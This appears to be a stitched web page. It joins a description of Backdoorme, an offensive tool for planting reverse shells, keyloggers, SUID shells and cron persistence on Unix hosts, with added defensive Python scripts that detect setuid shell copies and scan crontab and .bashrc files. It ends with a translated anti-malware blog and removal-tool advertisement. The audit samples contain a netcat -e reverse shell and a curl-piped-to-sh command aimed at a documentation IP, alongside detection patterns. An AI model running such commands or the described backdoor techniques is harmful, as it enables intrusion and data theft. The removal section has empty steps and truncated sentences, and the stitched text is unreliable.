Backdoor download the program. A hacker's backdoor into your PC is BackDoor spyware. Backdoor infection method


Backdoorme - utility for automatic creation of backdoors

Backdoorme is a powerful utility capable of creating many backdoors on Unix machines. Backdoorme uses the familiar metasploit interface with great extensibility. Backdoorme relies on having an existing SSH connection or credentials to the victim, through which it can transfer and deploy any backdoor. Please use Backdoorme only with explicit permission.

Backdoorme ships with a number of built-in backdoors, modules and auxiliary modules. Backdoors are the specific components that create and deploy a required backdoor, such as the netcat backdoor or the msfvenom backdoor. Modules can be applied to any backdoor and are used to make backdoors more powerful, stealthier, or quicker to tear down. Auxiliary modules are useful operations that can be performed to help maintain persistence.

Running backdoorme: first make sure you have the required dependencies installed.

$ python dependencies.py

Then start backdoorme:

$ python master.py

Backdoors

To use the backdoor, simply run the "use" keyword.

>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>

From there you can set options appropriate for the backdoor. Run either "show options" or "help" to view a list of options that can be configured.

Like metasploit, backdoors are organized by category.

  • Auxiliary
    • keylogger - adds a keylogger to the system and lets you have the results mailed back to you.
    • simplehttp - installs the python SimpleHTTP server on the client.
    • user - adds a new user to the target.
    • web - installs an Apache server on the client.
  • Escalation
    • setuid - the SetUID backdoor works by setting the setuid bit on an executable, assuming the user has root access. When that executable is later run by a user without root access, it executes with root privileges. By default this backdoor sets the setuid bit on nano, so that if root access is lost in any way an attacker can SSH back in as an unprivileged user and still run nano (or any binary of choice) as root ("nano /etc/shadow"). Note that deploying this escalation backdoor requires root access at the outset.
    • shell - the shell backdoor is a privilege-escalation backdoor similar to (but more specific than) its SetUID sibling. It copies the bash shell to a hidden binary and sets the SUID bit on it. Note that deploying this escalation backdoor requires root access at the outset. To use it when SSH-ed in as an unprivileged user, simply run ".bash -p" and you will have root access.
  • Shell
    • bash - uses a simple bash script to connect to a specific ip and port combination and pipe the result to bash.
    • bash2 - a slightly different (and more secure) version of the bash backdoor above, which does not require a password on the client side.
    • metasploit - uses msfvenom to generate a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.
    • netcat - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.
    • netcat_traditional - uses netcat-traditional's -e option to create a reverse shell.
    • perl - a script written in perl that redirects the result to bash and renames the process to look less conspicuous.
    • php - runs a php backdoor that sends the result to bash. It does not automatically install a web server; use the web module for that.
    • pupy - uses the n1nj4sec Pupy backdoor (link hidden from guests).
    • python - uses a short python script to execute commands and send the results back to the user.
    • web - deploys a web server on the target, then uploads the msfvenom php reverse_tcp backdoor and connects to the host. Although it is still a php backdoor, it is not the same as the php backdoor described above.
  • Access
    • remove_ssh - removes the ssh server on the client. Very handy to use at the end of a backdoor session to remove any traces.
    • ssh_key - creates an RSA key and copies it to the target so you can connect without an ssh password.
    • ssh_port - adds a new port for ssh.
  • Windows
    • windows - uses msfvenom to create a windows backdoor.
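The setuid and shell escalation entries above both rely on the same artifact: a copy of a shell or editor with the setuid bit set, usually tucked away as a hidden dotfile. The following is an added defender-side example, not part of Backdoorme, that walks a directory tree, collects every setuid regular file, and reports the ones that are not in a baseline, are hidden, or have the same content as the system shell. The baseline set, the demo directory tree and the "known shell" hash list are all constructed here for the demonstration.

```python
"""Find setuid copies of shells and other unexpected setuid files.

Added example, not part of Backdoorme: a defender-side check for the
technique the setuid and shell escalation backdoors use (a copy of a
shell or editor with the setuid bit set, often hidden as a dotfile).
BASELINE_SUID, the demo tree and the hash list are constructed here.
"""
import hashlib
import os
import stat
import tempfile
from typing import Dict, List, Tuple

# Constructed allow-list of setuid paths an administrator expects on a host.
# A real baseline comes from a known-good image or the package manifests.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}


def sha256_of(path: str) -> str:
    """Hash a file's contents so copies of a shell can be recognised by content."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_suid_files(root: str) -> List[Tuple[str, int]]:
    """Return (path, mode) for every regular file under root with the setuid bit."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink to a setuid file is not itself setuid
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_mode))
    return hits


def classify(hits: List[Tuple[str, int]], baseline: set, root: str,
             known_shells: Dict[str, str]) -> List[Tuple[str, str, List[str]]]:
    """Attach reasons to each setuid hit; an empty reason list means 'expected'."""
    report = []
    for path, mode in hits:
        # Present the path as it would appear on the audited host (root -> "/").
        logical = "/" + os.path.relpath(path, root).replace(os.sep, "/")
        reasons = []
        if logical not in baseline:
            reasons.append("not in baseline")
        if os.path.basename(path).startswith("."):
            reasons.append("hidden dotfile")
        digest = sha256_of(path)
        if digest in known_shells:
            reasons.append("content matches " + known_shells[digest])
        report.append((logical, oct(mode & 0o7777), reasons))
    return report


def build_demo_tree() -> str:
    """Construct a tiny fake root: one expected setuid binary, one hidden SUID shell copy."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    shell_bytes = b"#!/bin/sh\necho fake-bash\n"  # stands in for the real bash binary
    files = {
        "usr/bin/passwd": (b"#!/bin/sh\necho passwd\n", 0o4755),  # legitimate setuid
        "bin/bash": (shell_bytes, 0o755),                          # the normal shell
        "tmp/.bash": (shell_bytes, 0o4755),                        # hidden SUID copy
        "home/user/notes.txt": (b"hello\n", 0o644),
    }
    for rel, (data, mode) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
        os.chmod(path, mode)  # chmod after the write: Linux clears SUID on write by non-root
    return root


def audit(root: str) -> List[Tuple[str, str, List[str]]]:
    """Return only the setuid files that need a human to look at them."""
    shells = {sha256_of(os.path.join(root, "bin", "bash")): "/bin/bash"}
    full = classify(find_suid_files(root), BASELINE_SUID, root, shells)
    return [entry for entry in full if entry[2]]


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for logical, mode, reasons in audit(demo_root):
        print(f"{logical} {mode}: {', '.join(reasons)}")
```

Run against a real host, `audit("/")` (with a baseline built from the package manager's file lists) reports `/tmp/.bash 0o4755: not in baseline, hidden dotfile, content matches /bin/bash` for the artifact the shell escalation backdoor leaves behind, while the legitimate `/usr/bin/passwd` produces no finding. Comparing by content hash rather than name is the important part: a renamed copy of bash is still bash.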
Modules

Each backdoor has the ability to obtain additional modules that are used to make the backdoor more powerful. To add a module, simply use the "add" keyword.

(msf) >> add poison
+ Poison module added

Each module has additional options that can be configured and if "help" is run again you can see or set any additional options.

Modules available at this moment include:

  • Poison
    • Performs bin poisoning on the target computer: it compiles an executable that calls both the system utility and the existing backdoor.
    • For example, if the bin poisoning module is run with "ls", it compiles and uploads a binary called "ls" that runs both the existing backdoor and the original "ls", thus causing the user to trigger the backdoor more frequently.
  • Cron
    • Adds an existing backdoor to the root user's crontab to run at the specified frequency.
  • Web
    • Installs a web server and hosts a web page that runs the backdoor.
    • Just visit the site with a listener open and the backdoor is launched.
  • user
    • Adds a new user to the target.
  • startup
    • Allows you to create backdoors via bashrc and init files.
  • Whitelist
    • Whitelists an IP so that only that IP can connect to the backdoor.
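The Cron and startup modules persist a backdoor through the root crontab and through bashrc/init files, which are also the two places a responder checks first. The following is an added example, not part of Backdoorme, that parses a crontab (5-field and @reboot-style entries, skipping comments and variable assignments) and a shell rc fragment, and runs a small set of indicator patterns over each command. The sample crontab, the .bashrc text and the indicator list are constructed for the demonstration; 203.0.113.5 is a documentation address.

```python
"""Audit cron and shell start-up files for persistence of the kind the Cron and
startup modules install.

Added example, not part of Backdoorme: the sample crontab and .bashrc text and
the indicator patterns are constructed for this demonstration.
"""
import re
from typing import Dict, List, Tuple

# Constructed root crontab: lines 3 and 4 are the ones an auditor should notice.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/5 * * * * /tmp/.cache/.sysd >/dev/null 2>&1
@reboot nc 203.0.113.5 4444 -e /bin/sh
30 2 * * 0 /usr/local/bin/backup.sh
"""

# Constructed ~/.bashrc fragment: the last line fetches and runs remote code.
SAMPLE_BASHRC = """\
# .bashrc
export PATH=$HOME/bin:$PATH
alias ll='ls -l'
curl -s http://203.0.113.5/x | sh &
"""

# Indicators, each with the reason reported when it matches a command.
SUSPICIOUS = [
    ("hidden file under a temp directory", re.compile(r"/(tmp|var/tmp|dev/shm)/\.")),
    ("netcat with -e", re.compile(r"\b(nc|ncat|netcat)\b[^|;&]*\s-e\b")),
    ("/dev/tcp redirection", re.compile(r"/dev/(tcp|udp)/")),
    ("download piped to shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b")),
    ("base64-decoded payload", re.compile(r"base64\s+(-d|--decode)\b")),
]


def parse_crontab(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, schedule, command) per job; skip comments and env lines."""
    jobs = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue  # MAILTO=, PATH= and similar variable assignments
        if line.startswith("@"):  # @reboot, @daily, ... take a single schedule word
            parts = line.split(None, 1)
            schedule, command = parts[0], (parts[1] if len(parts) > 1 else "")
        else:  # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        jobs.append((lineno, schedule, command))
    return jobs


def scan_commands(source: str, commands: List[Tuple[int, str]]) -> List[Dict]:
    """Run every indicator over each command and keep those that match."""
    findings = []
    for lineno, command in commands:
        reasons = [name for name, rx in SUSPICIOUS if rx.search(command)]
        if reasons:
            findings.append({"source": source, "line": lineno,
                             "command": command, "reasons": reasons})
    return findings


def audit_crontab(text: str) -> List[Dict]:
    """Scan only the command part of each cron job, not the schedule fields."""
    return scan_commands("crontab", [(n, cmd) for n, _sched, cmd in parse_crontab(text)])


def audit_rc_file(text: str, name: str = "~/.bashrc") -> List[Dict]:
    """Shell rc files have no schedule: every non-comment line is a command."""
    lines = [(n, l.strip()) for n, l in enumerate(text.splitlines(), 1)
             if l.strip() and not l.strip().startswith("#")]
    return scan_commands(name, lines)


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB) + audit_rc_file(SAMPLE_BASHRC):
        print(f"{f['source']}:{f['line']} {f['reasons']} -> {f['command']}")
```

On the constructed input the scan flags crontab line 3 (a hidden file under /tmp), crontab line 4 (netcat with -e) and the final .bashrc line (a download piped to sh), and leaves the apt-get and backup jobs alone. For real use, feed it the output of `crontab -l` for each user plus the files under /etc/cron.d and the rc files in each home directory; the indicator list is deliberately short and is meant to be extended with what is normal for the host in question.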

Picking someone else's password is not an easy thing, unless the combination is something as banal as "qwerty". So it is in vain that Internet users who actively use Internet banking curse unknown hackers for stealing money from their electronic wallets by guessing password characters. Everything is much simpler: while wandering around the Runet, the robbed users themselves, without knowing it, downloaded a supplement along with the files they were interested in, be it music, video or something else. They downloaded the BackDoor spyware program, and that is when it all started...

In my case, my acquaintance with backdoors fell on my head like snow in July. After much deliberation I decided to leave dial-up Internet for 3G, having bought a modem and traffic from Beeline. Having returned home with the freshly acquired modem and installed its software on my computer, I set my sights on frenzied surfing of the Internet: the speed should have exceeded the dial-up one at least 50 times. ... unknown programs started popping up ... Without paying due attention to the actions of these same programs and turning off the computer until the next day, the next day I discovered that Dr.Web had gone down and did not want to hunt for viruses.

Back door in the PC for a hacker

What kind of animal is this BackDoor, how do you avoid acquiring it, and how do you remove it? A "back door", as backdoor translates from English, is created by a hacker and distributed inside programs and files popular among users, or (less often) by e-mail; its code is attached to them by the hacker-distributor. So we download it on our own and voluntarily! Once on the user's computer, the BackDoor virus registers itself in the root Windows folder and in a bunch of other places, blocks the antivirus and constantly sends its owner information about the passwords and accounts of the PC's user. In addition, this spyware virus actively spreads itself from a computer it seizes, using any external contact: ICQ, e-mail, mail agent, Skype, social media, etc. ... Grim, in a word.

What should an ordinary user who is not versed in repelling hacker attacks do? Having found the BackDoor spyware visiting your PC (if you do not have a sensible firewall or antivirus it will be hard to detect, perhaps only after money has been stolen and accounts emptied), get a specialized anti-spyware program. For example, I have Ad-Aware SE Personal, albeit with old databases and in the free version, but still effective. Then beat the asshole backdoor out of the key registry entries with it, quickly reinstall the antivirus and update its databases, start a full scan immediately after the update and wait for it to complete, no matter how long it takes!

Name of the threat: Backdoor

Executable file name: ??host.exe

Threat type:

Affected OS: Win32 (Windows XP, Windows Vista, Windows Seven, Windows 8)



Backdoor infection method

Backdoor copies its file(s) to your hard drive. The typical file name is ??host.exe. It then creates an autostart key in the registry with the name Backdoor and the value ??host.exe. You can also find it in the list of processes under the name ??host.exe or Backdoor.



Download Removal Tool

Download this program and remove Backdoor and ??chost.exe (download will start automatically):

* SpyHunter was developed by US-based EnigmaSoftware company and is able to remove Backdoor-related issues in automatic mode. The program has been tested on Windows XP, Windows Vista, Windows 7 and Windows 8.

Functions

The program is able to protect files and settings from malicious code.

The program can fix browser problems and protects browser settings.

Removal is guaranteed - if SpyHunter fails, free support is provided.

24/7 anti-virus support is included in the package.


Download Backdoor Removal Tool from Russian company Security Stronghold

If you are not sure which files to delete, use our program Backdoor Removal Tool. Backdoor Removal Tool will find and completely remove Backdoor and all the problems associated with the Backdoor virus. The fast, easy-to-use Backdoor Removal Tool will protect your PC from the Backdoor threat that harms your computer and violates your privacy. Backdoor Removal Tool scans your hard drives and registry and destroys any manifestation of Backdoor. Regular anti-virus software is powerless against malicious programs such as Backdoor. Download this simplified removal tool specially designed to solve problems with Backdoor and ??chost.exe (download will start automatically):

Functions

Removes all files created by Backdoor.

Removes all registry entries created by Backdoor.

The program can fix problems with the browser.

Immunizes the system.

Removal is guaranteed - if the Utility fails, free support is provided.

24/7 anti-virus support via the GoToAssist system is included in the package.


How to remove Backdoor manually

This problem can be solved manually by deleting the registry keys and files related to Backdoor, removing it from the startup list and de-registering all related DLLs. In addition, missing DLL files must be restored from the OS distribution if they were damaged.

To get rid of Backdoor, you need to:

1. End the following processes and delete the corresponding files:

  • 011e3ecab24891617792f6cc556c541f.exe
  • 02a572cd0e1d2ff8393075b839efcb64.exe
  • 04986c5cdcecf53f6bf739c1599a03ce.exe
  • 061da56505834b273a475f3827544e17.exe
  • 07596ec68058a0eba10bf02b7a88d048.exe
  • 07ff265743f71b15cc23bb814557f8e5.exe
  • 0ad266c58b49ee7d239b032b4c69e628.exe
  • 0c0002d8878bf0f373d352332ae7124f.exe
  • 0c573e14354d5b00e91161d3deef0df7.exe
  • 0ef88726226d112172058358b80f9b03.exe
  • 1427142166.exe
  • 146f8b1cc9be67e99e0ccc5ad10acfd2.exe
  • 1476552388.exe
  • 147bb8297e9cac245b35fc56c826f629.exe
  • 1670a7b26eac340d7e177bbb47ddfee0.exe
  • 1842849d10ce64dba5a853776610e006.exe
  • 1b63703a58b3b17098c080c84a35bd85.exe
  • 442804435.exe
  • 959296333.exe
  • backdoor.af.exe
  • backdoor.c
  • backdoor.haw.exe
  • backdoor.mdm.exe
  • backdoor.nb.exe
  • backdoor.pld.exe
  • backdoor.raw.exe
  • backdoor.rdr.exe
  • backdoor.tms.exe
  • backdoor.txt
  • backdoor.vb.ga.exe
  • backdoor.xel.exe
  • backdoor.zkt.exe
  • b_login.exe
  • ftpip.exe
  • icqnuke.exe
  • manual.info
  • ppupdater.exe
  • readme.exe
  • runtime.txt
  • showall.exe
  • xxx.exe
  • zemac.a.exe
  • notpa.exe

Warning: delete only files whose checksums are in the list of malicious ones. Your system may contain necessary files with the same names. We recommend using for a safe solution to the problem.

2. Delete the following folders:

3. Delete the following registry keys and/or values:

Warning: if registry key values are provided, remove only the specified values and leave the keys themselves intact. We recommend using for a safe solution to the problem.

4. Reset browser settings

Backdoor can sometimes affect your browser settings, for example by changing the search page and home page. We recommend using the free "Reset Browsers" feature under "Tools" in the program to reset all browsers at once. Note that before doing this you need to delete all files, folders and registry keys belonging to Backdoor. To reset browser settings manually, use these instructions:

For Internet Explorer

    If you are using Windows XP, click Start, then Run. Enter the following in the Open field without quotes and press Enter: "inetcpl.cpl".

    If you are using Windows 7 or Windows Vista, click Start. Enter the following in the Search field without quotes and press Enter: "inetcpl.cpl".

    Select the Advanced tab.

    Under Reset Internet Explorer settings, click Reset. Then press Reset again in the window that opens.

    Select the Delete personal settings checkbox to delete history and restore the search page and home page.

    After Internet Explorer has finished resetting, click Close in the dialog box.

A warning: Reset browser settings in Tools

For Google Chrome

    Find the Google Chrome installation folder at: C:\Users\"username"\AppData\Local\Google\Chrome\Application\User Data.

    In the User Data folder, find the file Default and rename it to Default Backup.

    Launch Google Chrome and a new Default file will be created.


Warning: if that does not work, use the free Reset browser settings option under Tools in Stronghold AntiMalware.

For Mozilla Firefox

    Open Firefox.

    Select Help > Troubleshooting Information from the menu.

    Click the Reset Firefox button.

    After Firefox finishes, it will show a window and create a folder on the desktop. Click Complete.

Warning: this is how you lose your passwords! We recommend using the free Reset browser settings option under Tools in Stronghold AntiMalware.

Generally speaking, backdoors are a specific kind of trojan, virus, keylogger, spyware or remote administration tool. They work the same way as those malware applications do, but their functions and payloads are more complex and dangerous, so they are grouped into a special category of their own.

How are backdoors distributed?

What risks can be initiated by this computer infection?

When the backdoor finds a path into the system, it performs the following actions:

  • Allows an intruder to create, delete, rename, copy or edit any file, execute various commands, change any system settings, change the Windows registry, launch, control and terminate applications, and install other software.
  • Allows a hacker to control the computer's hardware devices and change settings related to shutting down or restarting the computer without permission.
  • Steals personal information, valuable documents, passwords, logins, identity data and user activity logs, and tracks web browsing habits.
  • Records keystrokes and takes screenshots. In addition, it sends the collected data to specific email addresses, uploads it to a given FTP server, or transmits it over an Internet connection to remote hosts.
  • Infects files and installed applications and damages the entire system.
  • Distributes infected files to remote computers with certain security vulnerabilities, and performs hacker attacks against remote hosts.
  • Installs a hidden FTP server that can be used by intruders for various illegal purposes.